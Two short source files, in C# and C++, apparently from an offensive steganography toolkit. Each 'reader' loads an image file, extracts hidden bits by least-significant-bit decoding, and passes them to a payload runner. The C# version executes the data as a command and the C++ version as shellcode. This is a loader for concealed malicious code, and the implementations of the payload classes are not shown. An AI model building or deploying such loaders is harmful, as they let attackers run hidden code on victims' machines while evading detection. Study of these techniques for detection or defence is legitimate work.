File: readers/csharp/csharp/reader.cs
using System.Drawing;

using Reader.Algorithms;
using Reader.Delivery;
using Reader.Payloads;

namespace Reader
{
    class Reader
    {
        static byte[] payload_data;

        static Bitmap bm;


        static IDelivery  del  = new Local();
        static IAlgorithm algs = new LsbX(1);
        static IPayload   pld  = new Cmd();

        static void Main(string[] args)
        {
            if (args.Length == 2)
            {
                int payload_bits = System.Int32.Parse(args[0]);
                payload_data = new byte[payload_bits / 8];

                bm = del.loadImage(args[1]);
                algs.readImage(bm, payload_data);
                pld.Run(payload_data);
            }
        }
    }
}

File: readers/cpp/cpp/reader.cpp
#include "reader.h"

int _tmain(int argc, TCHAR** argv) {
    if (argc == 3) {      
        // Init Gdiplus
        GdiplusStartupInput gdiplusStartupInput;
        ULONG_PTR gdiplusToken;
        GdiplusStartup(&gdiplusToken, &gdiplusStartupInput, NULL);

        // Do the job
        int payload_bits = _ttoi(argv[1]);
        LPCTSTR location = argv[2];

        // TEMPLATES GO HERE
        auto img = ImageSources::FileSystem();
        Bitmap* bmp = img.loadImage(location);


        auto alg = Algorithms::LSBM();
        uint8_t* payload_data = alg.readImage(bmp, payload_bits);


        auto pld = Payloads::Shellcode();
        pld.Run(payload_data, payload_bits);

        // Shutdown Gdiplus
        GdiplusShutdown(gdiplusToken);
    }
    return 0;
}